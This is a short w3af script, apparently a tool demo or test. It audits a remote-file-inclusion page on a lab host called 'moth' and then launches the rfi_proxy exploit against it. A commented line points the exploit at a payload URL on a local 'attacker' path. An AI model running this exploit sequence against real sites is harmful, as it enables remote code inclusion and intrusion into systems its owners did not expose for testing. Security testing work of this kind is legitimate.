# This is the rfi proxy demo

plugins
audit rfi
audit config rfi
view
set listenAddress 127.0.0.1
set usew3afSite False
back

output console,text_file
output
output config text_file
set output_file output-w3af.txt
set verbose True
back
output config console
set verbose False
back
back

target
set target http://moth/w3af/audit/remoteFileInclusion/vulnerable.php?file=f0as9
back
start

exploit
exploit config rfi_proxy
set listenAddress 127.0.0.1
set proxyPublicIP 127.0.0.1
# With rfiConnGenerator configured
#set rfiConnGenerator http://127.0.0.1/attacker/rfip.txt
back
exploit rfi_proxy
#back
#exit
